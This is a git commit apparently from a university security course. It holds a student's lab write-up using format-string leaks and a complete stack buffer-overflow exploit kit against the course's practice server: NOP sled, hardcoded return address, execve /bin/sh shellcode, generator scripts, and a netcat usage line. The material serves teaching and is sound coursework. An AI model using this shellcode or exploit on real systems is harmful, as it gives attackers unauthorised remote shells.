Assignment 4

author: Camil Staps 2015-12-09 13:23:26 +0000
committer: Camil Staps 2015-12-09 13:23:26 +0000
commit: 78e74ea02fd52962290e2a1b816a90d9b9514a82 (patch)
tree: fa213fd71f72c6de405556e62551942f0e3f7a68
parent: Assignment 2, 3 (diff)
11 files changed, 131 insertions, 0 deletions
diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..d196b36
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "CamilStaps-s4498062-Assignment-4/ex3/bash-covert-channel"]
+	path = CamilStaps-s4498062-Assignment-4/ex3/bash-covert-channel
+	url = git@gist.github.com:0bae6b1c064f608a3808.git
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-4/ex1/ex1.txt
new file mode 100644
index 0000000..0f72c75
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/ex1.txt
@@ -0,0 +1,42 @@
+a
+    Determining the buffer size:
+
+        1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+        123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234P���
+
+    The buffer size seems to be 500.
+
+    Finding the return address:
+
+        %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
+        0x7ffff7ff81fe0x7ffff7dd8de00xfbad20880x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x7fffffffe4500x7fffffffe6700x4006b2(nil)0x1004005300x7fffffffe6800x4006cb(nil)0x7ffff7a70ead(nil)0x7fffffffe7680x1000000000x4006c2(nil)0xc5584fe82b4455a40x4005300x7fffffffe760(nil)(nil)0x3aa7b017e66455a40x3aa7a0a6379455a40x7fff00000000(nil)(nil)0x4006f00x7fffffffe7680x1(nil)(nil)0x4005300x7fffffffe760(nil)0x4005590x7fffffffe7580x1c0x10x7fffffffe95e(nil)0x7fffffffe97b0x7fffffffe9890x7fffffffe9a50x7fffffffe9b90x7fffffffe9cb0x7fffffffe9d50x7fffffffe9e00x7fffffffe9ee0x7fffffffe9fb0x7fffffffea0f0x7fffffffea1d0x7fffffffea5f0x7fffffffea700x7fffffffef910x7fffffffefb70x7fffffffefc70x7fffffffefd5(nil)0x210x7ffff7ffb0000x100x78bfbff0x60x10000x110x640x30x4000400x40x380x50x80x70x7ffff7ddd0000x8(nil)0x90x4005300xb0xfffe0xc0xfffe0xd0xfffe0xe0xfffe0x17(nil)0x190x7fffffffe9390x1f0x7fffffffefdb0xf0x7fffffffe949(nil)(nil)0xd48cc06ec9bfc1000xd262ac27f415a2b90x34365f3638782a(nil)0x6f2f0000000000000x736e6c75762f74700x6573736f2d7672650x65736e6c75762f630x5f4f4455530076720x303030313d4449470x5f45544f4d4552000x3534313d54534f480x3438312e3631312e0x49414d003139312e0x6d2f7261762f3d4c0x746f6f722f6c69610x474155474e414c000x3a42475f6e653d450x3d52455355006e650x4d4f4800746f6f720x746f6f722f3d450x4449555f4f4455530x4f4c00303030313d0x6f723d454d414e470x3d4d52455400746f0x35322d6d726574780x5500726f6c6f63360x3d454d414e5245530x54415000746f6f720x6c2f7273752f3d480x6962732f6c61636f0x6c2f7273752f3a6e0x6e69622f6c61636f0x62732f7273752f3a0x2f7273752f3a6e690x6962732f3a6e69620x4c006e69622f3a6e0x475f6e653d474e410x382d4654552e420x524f4c4f435f534c0x643a303d73723d530x3a34333b31303d690x36333b31303d6e6c0x703a30303d686d3a0x3a33333b30343d690x35333b31303d6f730x333b31303d6f643a0x3b30343d64623a350x64633a31303b33330x303b33333b30343d0x3b30343d726f3a310x75733a31303b31330x733a31343b37333d0x3a33343b30333d670x31343b30333d61630x343b30333d77743a0x3b34333d776f3a320x37333d74733a32340x303d78653a34343b0x742e2a3a32333b310x31333b31303d72610x303d7a67742e2a3a0x612e2a3a31333b310x31333b31303d6a720x303d7a61742e2a3a0x6c2e2a3a31333b310x31333b31303d687a0x3d616d7a6c2e2a3a0x2e2a3a31333b31300x333b31303d7a6c740x3d7a78742e2a3a310x2e2a3a31333b31300x333b31303d70697a0x31303d7a2e2a3a310x3d5a2e2a3a31333b0x2e2a3a31333b31300x31333b31303d7a640x31303d7a672e2a3a0x7a6c2e2a3a31333b0x2a3a31333b31303d0x333b31303d7a782e0x3d327a622e2a3a310x2e2a3a31333b31300x31333b31303d7a620x303d7a62742e2a3a0x742e2a3a31333b310x333b31303d327a620x303d7a742e2a3a310x642e2a3a31333b310x31333b31303d6265P���
+
+    Let's break this up:
+
+        0x7ffff7ff81fe
+        0x7ffff7dd8de0              <-- saved frame pointer *printf
+        0xfbad2088                  <-- return address *printf
+        0x7025702570257025          <-- buffer
+         ...
+        0x7025702570257025
+        0x7fffffffe450              <-- perhaps some local variable, looks like a pointer
+        0x7fffffffe670              <-- saved frame pointer parent function
+        0x4006b2                    <-- return address parent function
+        (nil)
+        0x100400530
+        ...
+
+    The saved frame pointer of the *printf function is 0x7ffff7dd8de0, so the buffer address is around that, probably a bit lower.
+
+b
+    Lucky me, during the SWS course I found a usable exploit on the vulnerable server. Let's use that one. See directory exploit.
+
+    Changes to the original:
+     
+     * genexploit.sh, 34 changed to 434 (buffer changed from 100 to 500)
+     * genretaddr.sh, return address updated
+     * README, 2266 replaced with 2288
+
+c
+    The server crashed on Tuesday evening, I didn't pursue this any further.
+
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/README b/CamilStaps-s4498062-Assignment-4/ex1/exploit/README
new file mode 100644
index 0000000..9e055de
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/README
@@ -0,0 +1,18 @@
+Usage: ./exploit.sh | nc hackme.cs.ru.nl 2288
+
+You start with control over input. Send EOF (ctrl+D) to send the exploit. Input control
+is then returned to you. Note that the shell will not echo a prompt. Just try some commands.
+
+If the exploit does not function out of the box, use the initial control to send format
+string (50 times %p). Get the desired return address from this (it's the 8 bytes before the
+stored frame pointer, 16 bytes before the current return address, in "int ret", right behind
+the buffer now recognizable by the run of 0x7025702570257025). Change the return address
+in genretaddr.sh. Run genexploit.sh to generate the new exploit. Note that the return address
+tends to drift, even with ASLR turned off. See genretaddr.sh for details.
+
+If the shellcode must be altered, do so in genshellcode.sh. If this also means the padding
+must be altered, change the number of NOPs in genexploit.sh (the first loop). If necessary,
+also alter the number of copies of the return address in genexploit.sh (the second loop).
+
+If you need more than a single try in one session (e.g. when ASLR is turned on), change
+exploit.sh to use the commented loop instead of `cat - exploit -`.
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit
new file mode 100644
index 0000000..4882996
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh
new file mode 100755
index 0000000..3c21d53
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh
@@ -0,0 +1,16 @@
+#!/bin/sh
+cat exploit -
+
+# cat - exploit - is the "best" way of doing this:
+#
+# It lets you explore the target using format strings, so that you can
+# craft your exploit into "exploit", execute it by sending EOF (ctrl+D),
+# and then once again you have direct input options.
+# 
+# Can also solve this with a looping construct, for when you need more
+# than one try, e.g.
+#while [ 1 ]
+#do
+#   cat -
+#   cat exploit
+#done
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh
new file mode 100755
index 0000000..5d46c8f
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+./genretaddr.sh
+./gennop.sh
+./genshellcode.sh
+for i in {1..434}
+do
+    cat nop >> exploittmp
+done
+cat shellcode >> exploittmp
+for i in {1..12}
+do
+    cat retaddr >> exploittmp;
+done
+tr -d "\n" < exploittmp > exploit
+echo >> exploit
+rm shellcode retaddr nop exploittmp
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh
new file mode 100755
index 0000000..e2b0fe7
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+echo -e "\x90" > nop
+
+# Could also use a sled of pushes but that changes the stack so less elegant.
+\ No newline at end of file
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh
new file mode 100755
index 0000000..1a741f2
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+echo -e "\x70\xe4\xff\xff\xff\x7f\x00\x00" > retaddr
+
+# 0x00007fffffffe470
+
+# We've noticed that even with ASLR turned off, the correct return
+# address can drift a few hundred bytes. We haven't determined a
+# cause for this. Take this into consideration when creating, guiding
+# and grading the assignment.
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
new file mode 100755
index 0000000..63fa491
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+echo -e "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" > shellcode
+
+# This shellcode translates as follows:
+#
+#  "\x48\x31\xd2"                             // xor %rdx, %rdx
+#  "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx
+#  "\x48\xc1\xeb\x08"                         // shr $0x8, %rbx
+#  "\x53"                                     // push %rbx 
+#  "\x48\x89\xe7"                             // mov %rsp, %rdi
+#  "\x52"                                     // push %rdx      // There is an error in the "original", push %rax will push
+#                                                               // some random stuff on the stack, instead of NULL, which will 
+#                                                               // cause the execve to fail with EFAULT (-14). See man execve.
+#  "\x57"                                     // push %rdi
+#  "\x48\x89\xe6"                             // mov %rsp, %rsi
+#  "\xb0\x3b"                                 // mov $0x3b, %al
+#  "\x0f\x05"                                 // syscall
+\ No newline at end of file
diff --git a/CamilStaps-s4498062-Assignment-4/ex3/bash-covert-channel b/CamilStaps-s4498062-Assignment-4/ex3/bash-covert-channel
new file mode 160000
+Subproject f8ff6345aa7d3914e578675563c67ca69a2bd28
diff --git a/CamilStaps-s4498062-Assignment-4/ex3/ex3 b/CamilStaps-s4498062-Assignment-4/ex3/ex3
new file mode 100644
index 0000000..55e76f1
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex3/ex3
@@ -0,0 +1,6 @@
+a
+    See bash-covert-channel/readme.
+
+b
+    I didn't find anything in the logs. This seems to be because chmods aren't logged.
+    The OS could monitor chmods, and log many chmods on the same file / restrict the number of chmods on the same file within some time frame.
author	Camil Staps	2015-12-09 13:23:26 +0000
committer	Camil Staps	2015-12-09 13:23:26 +0000
commit	78e74ea02fd52962290e2a1b816a90d9b9514a82 (patch)
tree	fa213fd71f72c6de405556e62551942f0e3f7a68
parent	Assignment 2, 3 (diff)